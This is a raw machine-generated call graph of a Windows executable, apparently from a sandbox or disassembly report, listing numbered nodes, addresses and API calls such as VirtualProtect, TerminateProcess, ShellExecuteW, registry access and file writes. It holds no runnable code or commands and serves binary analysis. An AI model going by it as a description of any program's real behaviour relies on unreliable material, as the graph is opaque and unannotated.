IsWow64Process 96908 f14437 96906->96908 96907->96909 96910 f53824 GetSystemInfo 96908->96910 96911 f1444f LoadLibraryA 96908->96911 96909->96906 96915 f537df 96909->96915 96912 f14460 GetProcAddress 96911->96912 96913 f1449c GetSystemInfo 96911->96913 96912->96913 96916 f14470 GetNativeSystemInfo 96912->96916 96914 f14476 96913->96914 96917 f1109d 96914->96917 96918 f1447a FreeLibrary 96914->96918 96916->96914 96919 f300a3 29 API calls __onexit 96917->96919 96918->96917 96919->96898 96920 f1105b 96925 f1344d 96920->96925 96922 f1106a 96956 f300a3 29 API calls __onexit 96922->96956 96924 f11074 96926 f1345d __wsopen_s 96925->96926 96927 f1a961 22 API calls 96926->96927 96928 f13513 96927->96928 96929 f13a5a 24 API calls 96928->96929 96930 f1351c 96929->96930 96957 f13357 96930->96957 96933 f133c6 22 API calls 96934 f13535 96933->96934 96935 f1515f 22 API calls 96934->96935 96936 f13544 96935->96936 96937 f1a961 22 API calls 96936->96937 96938 f1354d 96937->96938 96939 f1a6c3 22 API calls 96938->96939 96940 f13556 RegOpenKeyExW 96939->96940 96941 f53176 RegQueryValueExW 96940->96941 96945 f13578 96940->96945 96942 f53193 96941->96942 96943 f5320c RegCloseKey 96941->96943 96944 f2fe0b 22 API calls 96942->96944 96943->96945 96955 f5321e _wcslen 96943->96955 96946 f531ac 96944->96946 96945->96922 96947 f15722 22 API calls 96946->96947 96948 f531b7 RegQueryValueExW 96947->96948 96949 f531d4 96948->96949 96952 f531ee messages 96948->96952 96950 f16b57 22 API calls 96949->96950 96950->96952 96951 f14c6d 22 API calls 96951->96955 96952->96943 96953 f19cb3 22 API calls 96953->96955 96954 f1515f 22 API calls 96954->96955 96955->96945 96955->96951 96955->96953 96955->96954 96956->96924 96958 f51f50 __wsopen_s 96957->96958 96959 f13364 GetFullPathNameW 96958->96959 96960 f13386 96959->96960 96961 f16b57 22 API calls 96960->96961 96962 f133a4 96961->96962 96962->96933 96963 f1f7bf 96964 f1f7d3 96963->96964 96965 f1fcb6 96963->96965 96967 f1fcc2 96964->96967 96968 f2fddb 22 API calls 96964->96968 97056 f1aceb 23 API calls messages 96965->97056 97057 f1aceb 23 API calls messages 96967->97057 96970 f1f7e5 96968->96970 96970->96967 96971 f1f83e 96970->96971 96972 f1fd3d 96970->96972 96987 f1ed9d messages 96971->96987 96998 f21310 96971->96998 97058 f81155 22 API calls 96972->97058 96975 f1fef7 96982 f1a8c7 22 API calls 96975->96982 96975->96987 96978 f64600 96984 f1a8c7 22 API calls 96978->96984 96978->96987 96979 f64b0b 97060 f8359c 82 API calls __wsopen_s 96979->97060 96980 f1a8c7 22 API calls 96997 f1ec76 messages 96980->96997 96982->96987 96984->96987 96986 f30242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96986->96997 96988 f1fbe3 96988->96987 96990 f64bdc 96988->96990 96996 f1f3ae messages 96988->96996 96989 f1a961 22 API calls 96989->96997 97061 f8359c 82 API calls __wsopen_s 96990->97061 96991 f300a3 29 API calls pre_c_initialization 96991->96997 96993 f64beb 97062 f8359c 82 API calls __wsopen_s 96993->97062 96994 f301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96994->96997 96995 f2fddb 22 API calls 96995->96997 96996->96987 97059 f8359c 82 API calls __wsopen_s 96996->97059 96997->96975 96997->96978 96997->96979 96997->96980 96997->96986 96997->96987 96997->96988 96997->96989 96997->96991 96997->96993 96997->96994 96997->96995 96997->96996 97054 f201e0 207 API calls 2 library calls 96997->97054 97055 f206a0 41 API calls messages 96997->97055 96999 f217b0 96998->96999 97000 f21376 96998->97000 97254 f30242 5 API calls __Init_thread_wait 96999->97254 97002 f21390 97000->97002 97003 f66331 97000->97003 97007 f21940 9 API calls 97002->97007 97004 f6633d 97003->97004 97189 f9709c 97003->97189 97004->96997 97006 f217ba 97008 f217fb 97006->97008 97010 f19cb3 22 API calls 97006->97010 97009 f213a0 97007->97009 97013 f66346 97008->97013 97015 f2182c 97008->97015 97011 f21940 9 API calls 97009->97011 97019 f217d4 97010->97019 97012 f213b6 97011->97012 97012->97008 97014 f213ec 97012->97014 97259 f8359c 82 API calls __wsopen_s 97013->97259 97014->97013 97038 f21408 __fread_nolock 97014->97038 97256 f1aceb 23 API calls messages 97015->97256 97018 f21839 97257 f2d217 207 API calls 97018->97257 97255 f301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97019->97255 97022 f6636e 97260 f8359c 82 API calls __wsopen_s 97022->97260 97023 f2152f 97025 f663d1 97023->97025 97026 f2153c 97023->97026 97262 f95745 54 API calls _wcslen 97025->97262 97028 f21940 9 API calls 97026->97028 97030 f21549 97028->97030 97029 f2fddb 22 API calls 97029->97038 97033 f21940 9 API calls 97030->97033 97044 f215c7 messages 97030->97044 97031 f21872 97258 f2faeb 23 API calls 97031->97258 97032 f2fe0b 22 API calls 97032->97038 97039 f21563 97033->97039 97035 f2171d 97035->96997 97038->97018 97038->97022 97038->97023 97038->97029 97038->97032 97040 f663b2 97038->97040 97038->97044 97229 f1ec40 97038->97229 97039->97044 97046 f1a8c7 22 API calls 97039->97046 97261 f8359c 82 API calls __wsopen_s 97040->97261 97044->97031 97045 f2167b messages 97044->97045 97063 f21940 97044->97063 97073 f9958b 97044->97073 97076 f16216 97044->97076 97081 f8f0ec 97044->97081 97090 f9e204 97044->97090 97126 f16246 97044->97126 97130 f8744a 97044->97130 97186 f883da 97044->97186 97263 f8359c 82 API calls __wsopen_s 97044->97263 97045->97035 97253 f2ce17 22 API calls messages 97045->97253 97046->97044 97054->96997 97055->96997 97056->96967 97057->96972 97058->96987 97059->96987 97060->96987 97061->96993 97062->96987 97064 f21981 97063->97064 97068 f2195d 97063->97068 97264 f30242 5 API calls __Init_thread_wait 97064->97264 97067 f2198b 97067->97068 97265 f301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97067->97265 97072 f2196e 97068->97072 97266 f30242 5 API calls __Init_thread_wait 97068->97266 97069 f28727 97069->97072 97267 f301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97069->97267 97072->97044 97268 f97f59 97073->97268 97075 f9959b 97075->97044 97077 f16246 CloseHandle 97076->97077 97078 f1621e 97077->97078 97079 f16246 CloseHandle 97078->97079 97080 f1622d messages 97079->97080 97080->97044 97082 f17510 53 API calls 97081->97082 97083 f8f126 97082->97083 97388 f19e90 97083->97388 97085 f8f136 97086 f8f15b 97085->97086 97087 f1ec40 207 API calls 97085->97087 97089 f8f15f 97086->97089 97416 f19c6e 22 API calls 97086->97416 97087->97086 97089->97044 97091 f1a961 22 API calls 97090->97091 97092 f9e21b 97091->97092 97093 f17510 53 API calls 97092->97093 97094 f9e22a 97093->97094 97095 f16270 22 API calls 97094->97095 97096 f9e23d 97095->97096 97097 f17510 53 API calls 97096->97097 97098 f9e24a 97097->97098 97099 f9e262 97098->97099 97100 f9e2c7 97098->97100 97451 f1b567 39 API calls 97099->97451 97101 f17510 53 API calls 97100->97101 97103 f9e2cc 97101->97103 97105 f9e2d9 97103->97105 97106 f9e314 97103->97106 97104 f9e267 97104->97105 97108 f9e280 97104->97108 97454 f19c6e 22 API calls 97105->97454 97114 f9e32c 97106->97114 97455 f1b567 39 API calls 97106->97455 97452 f16d25 22 API calls __fread_nolock 97108->97452 97112 f1a8c7 22 API calls 97116 f9e35f 97112->97116 97113 f9e28d 97117 f16350 22 API calls 97113->97117 97115 f9e345 97114->97115 97456 f1b567 39 API calls 97114->97456 97115->97112 97432 f792c8 97116->97432 97119 f9e29b 97117->97119 97453 f16d25 22 API calls __fread_nolock 97119->97453 97121 f9e2b4 97122 f16350 22 API calls 97121->97122 97123 f9e2c2 97122->97123 97457 f162b5 22 API calls 97123->97457 97124 f9e2e6 97124->97044 97127 f16250 97126->97127 97128 f1625f 97126->97128 97127->97044 97128->97127 97129 f16264 CloseHandle 97128->97129 97129->97127 97131 f87469 97130->97131 97132 f87474 97130->97132 97469 f1b567 39 API calls 97131->97469 97135 f1a961 22 API calls 97132->97135 97173 f87554 97132->97173 97134 f2fddb 22 API calls 97136 f87587 97134->97136 97137 f87495 97135->97137 97138 f2fe0b 22 API calls 97136->97138 97140 f1a961 22 API calls 97137->97140 97139 f87598 97138->97139 97141 f16246 CloseHandle 97139->97141 97142 f8749e 97140->97142 97143 f875a3 97141->97143 97144 f17510 53 API calls 97142->97144 97145 f1a961 22 API calls 97143->97145 97146 f874aa 97144->97146 97147 f875ab 97145->97147 97470 f1525f 22 API calls 97146->97470 97150 f16246 CloseHandle 97147->97150 97149 f874bf 97151 f16350 22 API calls 97149->97151 97152 f875b2 97150->97152 97153 f874f2 97151->97153 97154 f17510 53 API calls 97152->97154 97155 f8754a 97153->97155 97471 f7d4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 97153->97471 97156 f875be 97154->97156 97473 f1b567 39 API calls 97155->97473 97158 f16246 CloseHandle 97156->97158 97161 f875c8 97158->97161 97160 f87502 97160->97155 97162 f87506 97160->97162 97461 f15745 97161->97461 97163 f19cb3 22 API calls 97162->97163 97165 f87513 97163->97165 97472 f7d2c1 26 API calls 97165->97472 97168 f875ea 97474 f153de 27 API calls messages 97168->97474 97169 f876de GetLastError 97170 f876f7 97169->97170 97172 f16216 CloseHandle 97170->97172 97184 f876a4 97172->97184 97173->97134 97173->97184 97174 f875f8 97475 f153c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97174->97475 97175 f8751c 97175->97155 97177 f87645 97178 f2fddb 22 API calls 97177->97178 97180 f87679 97178->97180 97179 f875ff 97179->97177 97476 f7ccff 97179->97476 97181 f1a961 22 API calls 97180->97181 97183 f87686 97181->97183 97183->97184 97480 f7417d 22 API calls __fread_nolock 97183->97480 97184->97044 97483 f898e3 97186->97483 97188 f883ea 97188->97044 97190 f970db 97189->97190 97191 f970f5 97189->97191 97555 f8359c 82 API calls __wsopen_s 97190->97555 97544 f95689 97191->97544 97195 f1ec40 206 API calls 97196 f97164 97195->97196 97197 f971ff 97196->97197 97201 f971a6 97196->97201 97212 f970ed 97196->97212 97198 f97253 97197->97198 97199 f97205 97197->97199 97200 f17510 53 API calls 97198->97200 97198->97212 97556 f81119 22 API calls 97199->97556 97202 f97265 97200->97202 97206 f80acc 22 API calls 97201->97206 97204 f1aec9 22 API calls 97202->97204 97207 f97289 CharUpperBuffW 97204->97207 97205 f97228 97557 f1a673 22 API calls 97205->97557 97209 f971de 97206->97209 97213 f972a3 97207->97213 97210 f21310 206 API calls 97209->97210 97210->97212 97211 f97230 97558 f1bf40 207 API calls 2 library calls 97211->97558 97212->97004 97214 f972aa 97213->97214 97215 f972f6 97213->97215 97551 f80acc 97214->97551 97216 f17510 53 API calls 97215->97216 97218 f972fe 97216->97218 97559 f2e300 23 API calls 97218->97559 97222 f21310 206 API calls 97222->97212 97223 f97308 97223->97212 97224 f17510 53 API calls 97223->97224 97225 f97323 97224->97225 97560 f1a673 22 API calls 97225->97560 97227 f97333 97561 f1bf40 207 API calls 2 library calls 97227->97561 97232 f1ec76 messages 97229->97232 97230 f300a3 29 API calls pre_c_initialization 97230->97232 97231 f64beb 97568 f8359c 82 API calls __wsopen_s 97231->97568 97232->97230 97232->97231 97233 f1fef7 97232->97233 97235 f1ed9d messages 97232->97235 97237 f1f3ae messages 97232->97237 97238 f2fddb 22 API calls 97232->97238 97239 f64600 97232->97239 97240 f64b0b 97232->97240 97241 f1a8c7 22 API calls 97232->97241 97247 f30242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97232->97247 97248 f1a961 22 API calls 97232->97248 97249 f1fbe3 97232->97249 97252 f301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97232->97252 97563 f201e0 207 API calls 2 library calls 97232->97563 97564 f206a0 41 API calls messages 97232->97564 97233->97235 97243 f1a8c7 22 API calls 97233->97243 97235->97038 97237->97235 97565 f8359c 82 API calls __wsopen_s 97237->97565 97238->97232 97239->97235 97245 f1a8c7 22 API calls 97239->97245 97566 f8359c 82 API calls __wsopen_s 97240->97566 97241->97232 97243->97235 97245->97235 97247->97232 97248->97232 97249->97235 97249->97237 97250 f64bdc 97249->97250 97567 f8359c 82 API calls __wsopen_s 97250->97567 97252->97232 97253->97045 97254->97006 97255->97008 97256->97018 97257->97031 97258->97031 97259->97044 97260->97044 97261->97044 97262->97039 97263->97044 97264->97067 97265->97068 97266->97069 97267->97072 97306 f17510 97268->97306 97272 f98281 97273 f9844f 97272->97273 97278 f9828f 97272->97278 97370 f98ee4 60 API calls 97273->97370 97276 f9845e 97277 f9846a 97276->97277 97276->97278 97293 f97fd5 messages 97277->97293 97342 f97e86 97278->97342 97279 f17510 53 API calls 97295 f98049 97279->97295 97284 f982c8 97357 f2fc70 97284->97357 97287 f982e8 97363 f8359c 82 API calls __wsopen_s 97287->97363 97288 f98302 97364 f163eb 22 API calls 97288->97364 97291 f982f3 GetCurrentProcess TerminateProcess 97291->97288 97292 f98311 97365 f16a50 22 API calls 97292->97365 97293->97075 97295->97272 97295->97279 97295->97293 97361 f7417d 22 API calls __fread_nolock 97295->97361 97362 f9851d 42 API calls _strftime 97295->97362 97296 f9832a 97304 f98352 97296->97304 97366 f204f0 22 API calls 97296->97366 97298 f984c5 97298->97293 97302 f984d9 FreeLibrary 97298->97302 97299 f98341 97367 f98b7b 75 API calls 97299->97367 97302->97293 97304->97298 97368 f204f0 22 API calls 97304->97368 97369 f1aceb 23 API calls messages 97304->97369 97371 f98b7b 75 API calls 97304->97371 97307 f17525 97306->97307 97323 f17522 97306->97323 97308 f1755b 97307->97308 97309 f1752d 97307->97309 97312 f1756d 97308->97312 97317 f5500f 97308->97317 97320 f550f6 97308->97320 97372 f351c6 26 API calls 97309->97372 97373 f2fb21 51 API calls 97312->97373 97313 f5510e 97313->97313 97315 f2fddb 22 API calls 97319 f17547 97315->97319 97316 f1753d 97316->97315 97322 f2fe0b 22 API calls 97317->97322 97324 f55088 97317->97324 97321 f19cb3 22 API calls 97319->97321 97375 f35183 26 API calls 97320->97375 97321->97323 97325 f55058 97322->97325 97323->97293 97329 f98cd3 97323->97329 97374 f2fb21 51 API calls 97324->97374 97326 f2fddb 22 API calls 97325->97326 97327 f5507f 97326->97327 97328 f19cb3 22 API calls 97327->97328 97328->97324 97330 f1aec9 22 API calls 97329->97330 97331 f98cee CharLowerBuffW 97330->97331 97376 f78e54 97331->97376 97335 f1a961 22 API calls 97336 f98d2a 97335->97336 97383 f16d25 22 API calls __fread_nolock 97336->97383 97338 f98d3e 97339 f193b2 22 API calls 97338->97339 97341 f98d48 _wcslen 97339->97341 97340 f98e5e _wcslen 97340->97295 97341->97340 97384 f9851d 42 API calls _strftime 97341->97384 97343 f97eec 97342->97343 97344 f97ea1 97342->97344 97348 f99096 97343->97348 97345 f2fe0b 22 API calls 97344->97345 97346 f97ec3 97345->97346 97346->97343 97347 f2fddb 22 API calls 97346->97347 97347->97346 97349 f992ab messages 97348->97349 97354 f990ba _strcat _wcslen 97348->97354 97349->97284 97350 f1b567 39 API calls 97350->97354 97351 f1b38f 39 API calls 97351->97354 97352 f1b6b5 39 API calls 97352->97354 97353 f17510 53 API calls 97353->97354 97354->97349 97354->97350 97354->97351 97354->97352 97354->97353 97355 f3ea0c 21 API calls ___std_exception_copy 97354->97355 97387 f7efae 24 API calls _wcslen 97354->97387 97355->97354 97358 f2fc85 97357->97358 97359 f2fd1d VirtualProtect 97358->97359 97360 f2fceb 97358->97360 97359->97360 97360->97287 97360->97288 97361->97295 97362->97295 97363->97291 97364->97292 97365->97296 97366->97299 97367->97304 97368->97304 97369->97304 97370->97276 97371->97304 97372->97316 97373->97316 97374->97320 97375->97313 97378 f78e74 _wcslen 97376->97378 97377 f78f63 97377->97335 97377->97341 97378->97377 97379 f78f68 97378->97379 97380 f78ea9 97378->97380 97379->97377 97386 f2ce60 41 API calls 97379->97386 97380->97377 97385 f2ce60 41 API calls 97380->97385 97383->97338 97384->97340 97385->97380 97386->97379 97387->97354 97389 f16270 22 API calls 97388->97389 97414 f19eb5 97389->97414 97390 f19fd2 97418 f1a4a1 97390->97418 97392 f19fec 97392->97085 97395 f5f7c4 97430 f796e2 84 API calls __wsopen_s 97395->97430 97396 f5f699 97402 f2fddb 22 API calls 97396->97402 97397 f1a405 97397->97392 97431 f796e2 84 API calls __wsopen_s 97397->97431 97401 f1a6c3 22 API calls 97401->97414 97404 f5f754 97402->97404 97403 f5f7d2 97405 f1a4a1 22 API calls 97403->97405 97407 f2fe0b 22 API calls 97404->97407 97406 f5f7e8 97405->97406 97406->97392 97408 f1a12c __fread_nolock 97407->97408 97408->97395 97408->97397 97410 f1a587 22 API calls 97410->97414 97411 f1aec9 22 API calls 97412 f1a0db CharUpperBuffW 97411->97412 97426 f1a673 22 API calls 97412->97426 97414->97390 97414->97395 97414->97396 97414->97397 97414->97401 97414->97408 97414->97410 97414->97411 97415 f1a4a1 22 API calls 97414->97415 97417 f14573 41 API calls _wcslen 97414->97417 97427 f148c8 23 API calls 97414->97427 97428 f149bd 22 API calls __fread_nolock 97414->97428 97429 f1a673 22 API calls 97414->97429 97415->97414 97416->97089 97417->97414 97419 f1a52b 97418->97419 97425 f1a4b1 __fread_nolock 97418->97425 97421 f2fe0b 22 API calls 97419->97421 97420 f2fddb 22 API calls 97422 f1a4b8 97420->97422 97421->97425 97423 f2fddb 22 API calls 97422->97423 97424 f1a4d6 97422->97424 97423->97424 97424->97392 97425->97420 97426->97414 97427->97414 97428->97414 97429->97414 97430->97403 97431->97392 97433 f1a961 22 API calls 97432->97433 97434 f792de 97433->97434 97435 f16270 22 API calls 97434->97435 97436 f792f2 97435->97436 97437 f78e54 41 API calls 97436->97437 97443 f79314 97436->97443 97438 f7930e 97437->97438 97438->97443 97458 f16d25 22 API calls __fread_nolock 97438->97458 97439 f78e54 41 API calls 97439->97443 97442 f16350 22 API calls 97442->97443 97443->97439 97443->97442 97444 f793b3 97443->97444 97446 f79397 97443->97446 97459 f16d25 22 API calls __fread_nolock 97443->97459 97445 f1a8c7 22 API calls 97444->97445 97447 f793c2 97444->97447 97445->97447 97460 f16d25 22 API calls __fread_nolock 97446->97460 97447->97123 97449 f793a7 97450 f16350 22 API calls 97449->97450 97450->97444 97451->97104 97452->97113 97453->97121 97454->97124 97455->97114 97456->97115 97457->97124 97458->97443 97459->97443 97460->97449 97462 f54035 97461->97462 97463 f1575c CreateFileW 97461->97463 97464 f1577b 97462->97464 97465 f5403b CreateFileW 97462->97465 97463->97464 97464->97168 97464->97169 97465->97464 97466 f54063 97465->97466 97481 f154c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97466->97481 97468 f5406e 97468->97464 97469->97132 97470->97149 97471->97160 97472->97175 97473->97173 97474->97174 97475->97179 97477 f7cd0e 97476->97477 97478 f7cd19 WriteFile 97476->97478 97482 f7cc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97477->97482 97478->97177 97480->97184 97481->97468 97482->97478 97484 f899e8 97483->97484 97485 f89902 97483->97485 97540 f89caa 39 API calls 97484->97540 97486 f2fddb 22 API calls 97485->97486 97488 f89909 97486->97488 97489 f2fe0b 22 API calls 97488->97489 97490 f8991a 97489->97490 97493 f16246 CloseHandle 97490->97493 97491 f899a2 97492 f89ac5 97491->97492 97496 f899ca 97491->97496 97499 f89a33 97491->97499 97534 f81e96 97492->97534 97495 f89925 97493->97495 97498 f1a961 22 API calls 97495->97498 97496->97188 97497 f89acc 97503 f7ccff 4 API calls 97497->97503 97500 f8992d 97498->97500 97501 f17510 53 API calls 97499->97501 97502 f16246 CloseHandle 97500->97502 97512 f89a3a 97501->97512 97504 f89934 97502->97504 97528 f89aa8 97503->97528 97505 f17510 53 API calls 97504->97505 97507 f89940 97505->97507 97506 f89abb 97542 f7cd57 30 API calls 97506->97542 97510 f16246 CloseHandle 97507->97510 97508 f89a6e 97511 f16270 22 API calls 97508->97511 97513 f8994a 97510->97513 97514 f89a7e 97511->97514 97512->97506 97512->97508 97516 f15745 5 API calls 97513->97516 97517 f89a8e 97514->97517 97521 f1a8c7 22 API calls 97514->97521 97515 f16246 CloseHandle 97518 f89b1e 97515->97518 97520 f89959 97516->97520 97522 f133c6 22 API calls 97517->97522 97519 f16216 CloseHandle 97518->97519 97519->97496 97523 f8995d 97520->97523 97524 f899c2 97520->97524 97521->97517 97525 f89a9c 97522->97525 97538 f153de 27 API calls messages 97523->97538 97526 f16216 CloseHandle 97524->97526 97541 f7cd57 30 API calls 97525->97541 97526->97496 97528->97496 97528->97515 97530 f8996b 97539 f153c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97530->97539 97532 f89972 97532->97491 97533 f7ccff 4 API calls 97532->97533 97533->97491 97535 f81e9f 97534->97535 97537 f81ea4 97534->97537 97543 f80f67 24 API calls __fread_nolock 97535->97543 97537->97497 97538->97530 97539->97532 97540->97491 97541->97528 97542->97528 97543->97537 97545 f956a4 97544->97545 97550 f956f2 97544->97550 97546 f2fe0b 22 API calls 97545->97546 97548 f956c6 97546->97548 97547 f2fddb 22 API calls 97547->97548 97548->97547 97548->97550 97562 f80a59 22 API calls 97548->97562 97550->97195 97552 f80ada 97551->97552 97554 f80b13 97551->97554 97553 f2fddb 22 API calls 97552->97553 97552->97554 97553->97554 97554->97222 97555->97212 97556->97205 97557->97211 97558->97212 97559->97223 97560->97227 97561->97212 97562->97548 97563->97232 97564->97232 97565->97235 97566->97235 97567->97231 97568->97235 97569 f52ba5 97570 f12b25 97569->97570 97571 f52baf 97569->97571 97597 f12b83 7 API calls 97570->97597 97573 f13a5a 24 API calls 97571->97573 97574 f52bb8 97573->97574 97576 f19cb3 22 API calls 97574->97576 97579 f52bc6 97576->97579 97578 f12b2f 97582 f13837 49 API calls 97578->97582 97585 f12b44 97578->97585 97580 f52bf5 97579->97580 97581 f52bce 97579->97581 97584 f133c6 22 API calls 97580->97584 97583 f133c6 22 API calls 97581->97583 97582->97585 97586 f52bd9 97583->97586 97587 f52bf1 GetForegroundWindow ShellExecuteW 97584->97587 97588 f12b5f 97585->97588 97601 f130f2 Shell_NotifyIconW ___scrt_fastfail 97585->97601 97589 f16350 22 API calls 97586->97589 97593 f52c26 97587->97593 97595 f12b66 SetCurrentDirectoryW 97588->97595 97592 f52be7 97589->97592 97594 f133c6 22 API calls 97592->97594 97593->97588 97594->97587 97596 f12b7a 97595->97596 97602 f12cd4 7 API calls 97597->97602 97599 f12b2a 97600 f12c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97599->97600 97600->97578 97601->97588 97602->97599 97603 f12de3 97604 f12df0 __wsopen_s 97603->97604 97605 f12e09 97604->97605 97606 f52c2b ___scrt_fastfail 97604->97606 97607 f13aa2 23 API calls 97605->97607 97608 f52c47 GetOpenFileNameW 97606->97608 97609 f12e12 97607->97609 97610 f52c96 97608->97610 97619 f12da5 97609->97619 97612 f16b57 22 API calls 97610->97612 97614 f52cab 97612->97614 97614->97614 97616 f12e27 97637 f144a8 97616->97637 97620 f51f50 __wsopen_s 97619->97620 97621 f12db2 GetLongPathNameW 97620->97621 97622 f16b57 22 API calls 97621->97622 97623 f12dda 97622->97623 97624 f13598 97623->97624 97625 f1a961 22 API calls 97624->97625 97626 f135aa 97625->97626 97627 f13aa2 23 API calls 97626->97627 97628 f135b5 97627->97628 97629 f135c0 97628->97629 97630 f532eb 97628->97630 97632 f1515f 22 API calls 97629->97632 97635 f5330d 97630->97635 97673 f2ce60 41 API calls 97630->97673 97633 f135cc 97632->97633 97667 f135f3 97633->97667 97636 f135df 97636->97616 97638 f14ecb 94 API calls 97637->97638 97639 f144cd 97638->97639 97640 f53833 97639->97640 97642 f14ecb 94 API calls 97639->97642 97641 f82cf9 80 API calls 97640->97641 97643 f53848 97641->97643 97644 f144e1 97642->97644 97645 f5384c 97643->97645 97646 f53869 97643->97646 97644->97640 97647 f144e9 97644->97647 97648 f14f39 68 API calls 97645->97648 97649 f2fe0b 22 API calls 97646->97649 97650 f53854 97647->97650 97651 f144f5 97647->97651 97648->97650 97658 f538ae 97649->97658 97690 f7da5a 82 API calls 97650->97690 97689 f1940c 136 API calls 2 library calls 97651->97689 97654 f12e31 97655 f53862 97655->97646 97656 f53a5f 97660 f53a67 97656->97660 97657 f14f39 68 API calls 97657->97660 97658->97656 97659 f1a4a1 22 API calls 97658->97659 97658->97660 97664 f19cb3 22 API calls 97658->97664 97674 f7967e 97658->97674 97677 f80b5a 97658->97677 97683 f13ff7 97658->97683 97691 f795ad 42 API calls _wcslen 97658->97691 97659->97658 97660->97657 97692 f7989b 82 API calls __wsopen_s 97660->97692 97664->97658 97668 f13605 97667->97668 97672 f13624 __fread_nolock 97667->97672 97670 f2fe0b 22 API calls 97668->97670 97669 f2fddb 22 API calls 97671 f1363b 97669->97671 97670->97672 97671->97636 97672->97669 97673->97630 97675 f2fe0b 22 API calls 97674->97675 97676 f796ae __fread_nolock 97675->97676 97676->97658 97676->97676 97678 f80b65 97677->97678 97679 f2fddb 22 API calls 97678->97679 97680 f80b7c 97679->97680 97681 f19cb3 22 API calls 97680->97681 97682 f80b87 97681->97682 97682->97658 97684 f1400a 97683->97684 97686 f140ae 97683->97686 97685 f2fe0b 22 API calls 97684->97685 97687 f1403c 97684->97687 97685->97687 97686->97658 97687->97686 97688 f2fddb 22 API calls 97687->97688 97688->97687 97689->97654 97690->97655 97691->97658 97692->97660 97693 f1dee5 97696 f1b710 97693->97696 97697 f1b72b 97696->97697 97698 f60146 97697->97698 97699 f600f8 97697->97699 97725 f1b750 97697->97725 97738 f958a2 207 API calls 2 library calls 97698->97738 97702 f60102 97699->97702 97705 f6010f 97699->97705 97699->97725 97736 f95d33 207 API calls 97702->97736 97721 f1ba20 97705->97721 97737 f961d0 207 API calls 2 library calls 97705->97737 97708 f1bbe0 40 API calls 97708->97725 97709 f603d9 97709->97709 97712 f1ba4e 97714 f60322 97741 f95c0c 82 API calls 97714->97741 97721->97712 97742 f8359c 82 API calls __wsopen_s 97721->97742 97722 f1ec40 207 API calls 97722->97725 97723 f2d336 40 API calls 97723->97725 97724 f1a8c7 22 API calls 97724->97725 97725->97708 97725->97712 97725->97714 97725->97721 97725->97722 97725->97723 97725->97724 97727 f1a81b 41 API calls 97725->97727 97728 f2d2f0 40 API calls 97725->97728 97729 f2a01b 207 API calls 97725->97729 97730 f30242 5 API calls __Init_thread_wait 97725->97730 97731 f2edcd 22 API calls 97725->97731 97732 f300a3 29 API calls __onexit 97725->97732 97733 f301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97725->97733 97734 f2ee53 82 API calls 97725->97734 97735 f2e5ca 207 API calls 97725->97735 97739 f1aceb 23 API calls messages 97725->97739 97740 f6f6bf 23 API calls 97725->97740 97727->97725 97728->97725 97729->97725 97730->97725 97731->97725 97732->97725 97733->97725 97734->97725 97735->97725 97736->97705 97737->97721 97738->97725 97739->97725 97740->97725 97741->97721 97742->97709 97743 f11044 97748 f110f3 97743->97748 97745 f1104a 97784 f300a3 29 API calls __onexit 97745->97784 97747 f11054 97785 f11398 97748->97785 97752 f1116a 97753 f1a961 22 API calls 97752->97753 97754 f11174 97753->97754 97755 f1a961 22 API calls 97754->97755 97756 f1117e 97755->97756 97757 f1a961 22 API calls 97756->97757 97758 f11188 97757->97758 97759 f1a961 22 API calls 97758->97759 97760 f111c6 97759->97760 97761 f1a961 22 API calls 97760->97761 97762 f11292 97761->97762 97795 f1171c 97762->97795 97766 f112c4 97767 f1a961 22 API calls 97766->97767 97768 f112ce 97767->97768 97769 f21940 9 API calls 97768->97769 97770 f112f9 97769->97770 97816 f11aab 97770->97816 97772 f11315 97773 f11325 GetStdHandle 97772->97773 97774 f52485 97773->97774 97775 f1137a 97773->97775 97774->97775 97776 f5248e 97774->97776 97778 f11387 OleInitialize 97775->97778 97777 f2fddb 22 API calls 97776->97777 97779 f52495 97777->97779 97778->97745 97823 f8011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97779->97823 97781 f5249e 97824 f80944 CreateThread 97781->97824 97783 f524aa CloseHandle 97783->97775 97784->97747 97825 f113f1 97785->97825 97788 f113f1 22 API calls 97789 f113d0 97788->97789 97790 f1a961 22 API calls 97789->97790 97791 f113dc 97790->97791 97792 f16b57 22 API calls 97791->97792 97793 f11129 97792->97793 97794 f11bc3 6 API calls 97793->97794 97794->97752 97796 f1a961 22 API calls 97795->97796 97797 f1172c 97796->97797 97798 f1a961 22 API calls 97797->97798 97799 f11734 97798->97799 97800 f1a961 22 API calls 97799->97800 97801 f1174f 97800->97801 97802 f2fddb 22 API calls 97801->97802 97803 f1129c 97802->97803 97804 f11b4a 97803->97804 97805 f11b58 97804->97805 97806 f1a961 22 API calls 97805->97806 97807 f11b63 97806->97807 97808 f1a961 22 API calls 97807->97808 97809 f11b6e 97808->97809 97810 f1a961 22 API calls 97809->97810 97811 f11b79 97810->97811 97812 f1a961 22 API calls 97811->97812 97813 f11b84 97812->97813 97814 f2fddb 22 API calls 97813->97814 97815 f11b96 RegisterWindowMessageW 97814->97815 97815->97766 97817 f5272d 97816->97817 97818 f11abb 97816->97818 97832 f83209 23 API calls 97817->97832 97819 f2fddb 22 API calls 97818->97819 97821 f11ac3 97819->97821 97821->97772 97822 f52738 97823->97781 97824->97783 97833 f8092a 28 API calls 97824->97833 97826 f1a961 22 API calls 97825->97826 97827 f113fc 97826->97827 97828 f1a961 22 API calls 97827->97828 97829 f11404 97828->97829 97830 f1a961 22 API calls 97829->97830 97831 f113c6 97830->97831 97831->97788 97832->97822 97834 f62a00 97835 f1d7b0 messages 97834->97835 